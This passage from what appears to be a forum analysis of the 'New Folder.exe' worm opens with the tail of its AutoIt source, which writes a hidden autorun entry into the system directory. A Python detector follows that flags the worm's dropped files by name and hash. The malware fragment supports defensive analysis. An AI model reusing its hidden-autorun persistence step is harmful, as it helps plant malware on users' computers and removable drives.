IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l","Open ")
Sleep (1)
FileSetAttrib (@SystemDir & "\autorun.ini","+RSH")
EndFunc
 
; ----------------------------------------------------------------------------
;
; Well, that's it
; Hope you will use it for good things like creating an anti-New Folder tool like I did
; If you have any questions dont hesitate to contact me on the forum
; New Folder.exe Code analyzed By Koudelka... Lebanese By Nature...Proud By Choice
;
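
A defender-side triage sketch for the drop pattern the script above leaves on removable drives and shares: `autorun.inf`, `New Folder.exe`, `SSVICHOSST.exe`, and a copy named after each folder it is placed in. This is an added example, not part of the original post or the analysed script; the function names and the sample tree are constructed for illustration.

```python
import hashlib
import os
from collections import Counter

# File names dropped by the script in the post (compared case-insensitively).
KNOWN_NAMES = {"new folder.exe", "ssvichosst.exe"}


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(1 << 20), b""):
            digest.update(block)
    return digest.hexdigest()


def autorun_targets(root):
    """Lower-cased .exe names referenced by any key in <root>/autorun.inf."""
    targets = set()
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return targets
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if line.startswith((";", "[")) or "=" not in line:
                continue
            value = line.split("=", 1)[1].strip().strip('"').lower()
            if value.endswith(".exe"):
                targets.add(value.replace("\\", "/").rsplit("/", 1)[-1])
    return targets


def triage_volume(root):
    """Return findings ({path, reasons, sha256, copies}) sorted by path.

    "copies" counts flagged files sharing one hash: a payload copied into many
    folders scores high, an unrelated program named like its folder scores 1.
    """
    root = os.path.abspath(root)
    targets = autorun_targets(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        at_root = dirpath == root
        folder = os.path.basename(dirpath).lower()
        for name in files:
            lower = name.lower()
            if not lower.endswith(".exe"):
                continue
            reasons = []
            if lower in KNOWN_NAMES:
                reasons.append("known-name")
            if at_root and lower in targets:
                reasons.append("autorun-target")
            if not at_root and lower[:-4] == folder:
                reasons.append("folder-named")
            if not reasons:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.append({"path": rel, "reasons": reasons,
                             "sha256": sha256_of(full)})
    counts = Counter(f["sha256"] for f in findings)
    for f in findings:
        f["copies"] = counts[f["sha256"]]
    return sorted(findings, key=lambda f: f["path"])


def build_constructed_sample(root):
    """Create a harmless constructed tree (plain bytes, not real executables)."""
    payload = b"constructed placeholder bytes, not an executable"
    layout = {
        "autorun.inf": b"[Autorun]\r\nOpen=SSVICHOSST.exe\r\n",
        "SSVICHOSST.exe": payload,
        "New Folder.exe": payload,
        "Photos/Photos.exe": payload,
        "Photos/Trip/Trip.exe": payload,
        "Tools/Tools.exe": b"unrelated constructed program",
        "Tools/setup.exe": b"another unrelated file",
    }
    for rel, data in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        for f in triage_volume(tmp):
            print(f["copies"], f["path"], ",".join(f["reasons"]))
```

A finding whose only reason is `folder-named` with `copies` equal to 1 is weak evidence on its own; the same hash repeated across many folders is the signal worth acting on.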
